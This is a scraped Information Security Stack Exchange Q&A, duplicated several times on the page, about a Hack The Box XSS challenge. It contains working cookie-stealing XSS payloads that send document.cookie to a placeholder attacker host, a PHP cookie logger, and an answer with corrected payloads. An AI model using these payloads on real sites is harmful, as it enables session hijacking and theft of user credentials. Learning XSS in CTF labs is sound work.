XSS code not fetching back script












0














I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>









share|improve this question
























  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago
















0














I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>









share|improve this question
























  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago














0












0








0







I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>









share|improve this question















I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>


And this is my php script that is supposed to be receiving the file.



<?php
header ('Location:https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "nn");
?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>






xss javascript






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited 5 hours ago

























asked 7 hours ago









Rich C

1115




1115












  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago


















  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago
















Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
– tim
6 hours ago




Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
– tim
6 hours ago












@tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
– Rich C
5 hours ago




@tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
– Rich C
5 hours ago










1 Answer
1






active

oldest

votes


















5














As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|edit

















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago













Your Answer








StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "162"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});














draft saved

draft discarded


















StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









5














As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|edit

















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago


















5














As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|edit

















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago
















5












5








5






As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>





share|edit












As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>






share|edit












share|edit



share|edit










answered 5 hours ago









tim

23.1k66294




23.1k66294








  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago
















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago










1




1




If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
– EdOverflow
5 hours ago






If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
– EdOverflow
5 hours ago




















draft saved

draft discarded




















































Thanks for contributing an answer to Information Security Stack Exchange!


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.





Some of your past answers have not been well-received, and you're in danger of being blocked from answering.


Please pay close attention to the following guidance:


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







Popular posts from this blog

Morgemoulin

Scott Moir

Souastre